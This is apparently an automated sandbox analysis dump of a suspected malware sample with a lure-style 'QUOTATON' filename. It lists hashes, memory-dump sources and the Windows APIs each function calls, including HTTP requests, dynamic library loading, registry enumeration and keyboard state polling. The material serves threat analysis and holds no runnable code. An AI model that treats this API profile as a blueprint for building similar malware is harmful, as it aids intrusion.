• Opcode ID: a6d875a7c7e7dad78fea6ed1815237edbe2b8612c30760a01aa4685854fda843
• Instruction ID: 54fce3695513c92ba8d57931cb98f424b0f8b9898a8e8e85ac013fd8aa55b383
• Opcode Fuzzy Hash: a6d875a7c7e7dad78fea6ed1815237edbe2b8612c30760a01aa4685854fda843
• Instruction Fuzzy Hash: EC91AE716043019FCB04DF24C58495BBBE4EF99314F14992EF89AEB3A2DB30E945CB92
                                                                      APIs
                                                                        • Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9
                                                                      • _memset.LIBCMT ref: 00E62B87
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62BB6
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62C69
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E62C97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                      • String ID: 0
                                                                      • API String ID: 4152858687-4108050209
                                                                      • Opcode ID: 18b1f1622ef2478c1ebe330b6ca17f63df0a1cbdf97ecafe2fa4e5d632874aab
                                                                      • Instruction ID: 851a3cb442ed8908c1fc4fa27fe538757e7e415a8478144437734647333b7253
                                                                      • Opcode Fuzzy Hash: 18b1f1622ef2478c1ebe330b6ca17f63df0a1cbdf97ecafe2fa4e5d632874aab
                                                                      • Instruction Fuzzy Hash: 2651FF71248B009EC7249F28E845A6FB7E8EF94398F042A2DFA94F61D1DB70CC44C792
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_free
                                                                      • String ID: 3c$_
                                                                      • API String ID: 2620147621-4099079164
                                                                      • Opcode ID: 6fcf425260ef571b45fccc345fd595930c12a0b738c5f40ad79598b3ddeb791b
                                                                      • Instruction ID: 51bdcff3ff12a974b8081fc9daa03e90854b5b8cc33cff20138bb1ea5fbb9e23
                                                                      • Opcode Fuzzy Hash: 6fcf425260ef571b45fccc345fd595930c12a0b738c5f40ad79598b3ddeb791b
                                                                      • Instruction Fuzzy Hash: 89517A71A043418FDB25CF28D480BAEBBE5FF89314F44582DE999A7351DB31E941CB82
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$_memmove
                                                                      • String ID: 3c$ERCP
                                                                      • API String ID: 2532777613-1756721700
                                                                      • Opcode ID: 43edea1557df9b1c41455973bc1c7cfb4244561b372d3be6b42b4d9460be6e31
                                                                      • Instruction ID: 5ff9e201c49e1aef71b2aba738efa6f1878a88e86192ed7e8d6db177ff64a174
                                                                      • Opcode Fuzzy Hash: 43edea1557df9b1c41455973bc1c7cfb4244561b372d3be6b42b4d9460be6e31
                                                                      • Instruction Fuzzy Hash: 9F51AF71A00705DBDB24CF65C9817EAB7F4EF44308F20596EE94AEB291E770AA84CB40
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E627C0
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E627DC
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00E62822
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EC5890,00000000), ref: 00E6286B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1173514356-4108050209
                                                                      • Opcode ID: 7c20815738d2c8d5dd1cf5a45031ec74d64ddbda71b5ebf33814cffb1407b421
                                                                      • Instruction ID: 5bf29ed5aa1e3c9345bff996b870c9296ba5723d84a39298e7fa95b2e3a29e7c
                                                                      • Opcode Fuzzy Hash: 7c20815738d2c8d5dd1cf5a45031ec74d64ddbda71b5ebf33814cffb1407b421
                                                                      • Instruction Fuzzy Hash: 5D41C0706447019FD724DF28EC44B5ABBE4EF85354F04492DFAA5A72D2D730A805CB62
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D7C5
                                                                        • Part of subcall function 00E0784B: _memmove.LIBCMT ref: 00E07899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower_memmove
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 3425801089-567219261
                                                                      • Opcode ID: bb698277f97271238c6e62596b49a10849efcc086b6f71b8c99d4f2a35de646b
                                                                      • Instruction ID: 885eb143d7c04484dec5473b7d87b942dba058cb9ec74f30bc0536abff3418c6
                                                                      • Opcode Fuzzy Hash: bb698277f97271238c6e62596b49a10849efcc086b6f71b8c99d4f2a35de646b
                                                                      • Instruction Fuzzy Hash: 1131AF71908619AFDF04EF54CC919EEB3F4FF44324B10A629E869B76D2DB31A945CB80
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E58F14
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E58F27
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E58F57
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 365058703-1403004172
                                                                      • Opcode ID: 5b367c63412eeede1784f42a2496ad4288d83bf640c4bdf3519f73bb7920b8d1
                                                                      • Instruction ID: 78f205381124b11ac318bc0a88a0a0f67ee51993ecfa20e2f21386a3717b41f4
                                                                      • Opcode Fuzzy Hash: 5b367c63412eeede1784f42a2496ad4288d83bf640c4bdf3519f73bb7920b8d1
                                                                      • Instruction Fuzzy Hash: D1210471A00108BEDB14ABB0DC45CFFB7A9DF45360B146A29F865B71E1DF39184DDA60
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E7184C
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E71872
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E718A2
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00E718E9
                                                                        • Part of subcall function 00E72483: GetLastError.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E72498
                                                                        • Part of subcall function 00E72483: SetEvent.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E724AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 55c7d80fb4589e4d4c75f9c667777e037cb269f40852ee64334a725d976f48c6
                                                                      • Instruction ID: 56c42544eb0b38a5b4bc35fd0e059f88a072ffa5f0f12ace6da841bfdba2bd90
                                                                      • Opcode Fuzzy Hash: 55c7d80fb4589e4d4c75f9c667777e037cb269f40852ee64334a725d976f48c6
                                                                      • Instruction Fuzzy Hash: 1921B0B1500308BFFB119F69DC85EBB77EDEB48748F10916AF549B2140EA258D0557A1
                                                                      APIs
                                                                        • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                                                                        • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                                                                        • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E86461
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00E86468
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E8647D
                                                                      • DestroyWindow.USER32(?), ref: 00E86485
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      • Opcode ID: 1d23a9cc71517bf059273e913b70c8f93990e47bdde86a1feb8b62dc752aae3b
                                                                      • Instruction ID: 78135c12e7bcfab3d5755f09de77307042c7b88b21278778ff3332eb23dbcd2e
                                                                      • Opcode Fuzzy Hash: 1d23a9cc71517bf059273e913b70c8f93990e47bdde86a1feb8b62dc752aae3b
                                                                      • Instruction Fuzzy Hash: 5A215E71110205AFEF106F64DC80EBF77A9FB59368F206629FA2CB61A0D7719C91A760
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E66DBC
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66DEF
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00E66E01
                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E66E3B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: 04492c4c63a5042081872f2b67edb62f8fdc481e55105e2605d2d9e5d2eba188
                                                                      • Instruction ID: dc11096d290093898ae178903075a4fe8ed3b4769cafba95a11289d47092bd07
                                                                      • Opcode Fuzzy Hash: 04492c4c63a5042081872f2b67edb62f8fdc481e55105e2605d2d9e5d2eba188
                                                                      • Instruction Fuzzy Hash: 4821A474650309AFDB20AF29EC05A9AB7F8EF447A4F205629FCA0F72D0DB719954CB50
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E66E89
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E66EBB
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00E66ECC
                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E66F06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: 8fd76c5825cab176f232b8576abf9c53fcba29d5d803aacdec0968ae7768f120
                                                                      • Instruction ID: ab9a3af91619195871d1c5ee30e6803f0fe81ef759d24567dfc81b2ea83a98e2
                                                                      • Opcode Fuzzy Hash: 8fd76c5825cab176f232b8576abf9c53fcba29d5d803aacdec0968ae7768f120
                                                                      • Instruction Fuzzy Hash: 002192795503059FDB209F69EC04A9AB7E8AF45764F200B19F8A0F72D0DB71A950C750
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E6AC54
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E6ACA8
                                                                      • __swprintf.LIBCMT ref: 00E6ACC1
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E8F910), ref: 00E6ACFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                      • String ID: %lu
                                                                      • API String ID: 3164766367-685833217
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E6115F
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E61184
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E6118E
                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00E5FCED,?,00E60D40,?,00008000), ref: 00E611C1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID: @
                                                                      • API String ID: 2875609808-411606354
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00E61B19
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 3964851224-769500911
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E7EC07
                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E7EC37
                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E7ED6A
                                                                      • CloseHandle.KERNEL32(?), ref: 00E7EDEB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                      • String ID:
                                                                      • API String ID: 2364364464-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1559183368-0
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FDAD,?,?), ref: 00E80E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E800FD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E8013C
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E80183
                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00E801AF
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E801BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                      • String ID:
                                                                      • API String ID: 3440857362-0
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7D927
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E7D9AA
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E7D9C6
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00E7DA07
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E7DA21
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 327935632-0
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E6E61F
                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E6E648
                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E6E687
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E6E6AC
                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E6E6B4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1389676194-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00E02357
                                                                      • ScreenToClient.USER32(00EC57B0,?), ref: 00E02374
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00E02399
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00E023A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E563E7
                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00E56433
                                                                      • TranslateMessage.USER32(?), ref: 00E5645C
                                                                      • DispatchMessageW.USER32(?), ref: 00E56466
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E56475
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                      • String ID:
                                                                      • API String ID: 2108273632-0
                                                                      • Opcode ID: 7ee2afcb6b901d34c3207ba2332296bfe4c6f5e51f267201201d3de8347ff98c
                                                                      • Instruction ID: 53a551d8f08ee1360d03f8cb9ac25b2515bf930847a3ac3935aab1d063684d68
                                                                      • Opcode Fuzzy Hash: 7ee2afcb6b901d34c3207ba2332296bfe4c6f5e51f267201201d3de8347ff98c
                                                                      • Instruction Fuzzy Hash: 063183325006469FDB648FB1DC44FA67BB8BB01306F941975E825E31B1E725A4CDD750
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00E58A30
                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00E58ADA
                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E58AE2
                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00E58AF0
                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E58AF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
                                                                      • Instruction ID: d9809994ed73a0f477be0838b7fbb527657164605c114021d86526f48f67f934
                                                                      • Opcode Fuzzy Hash: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
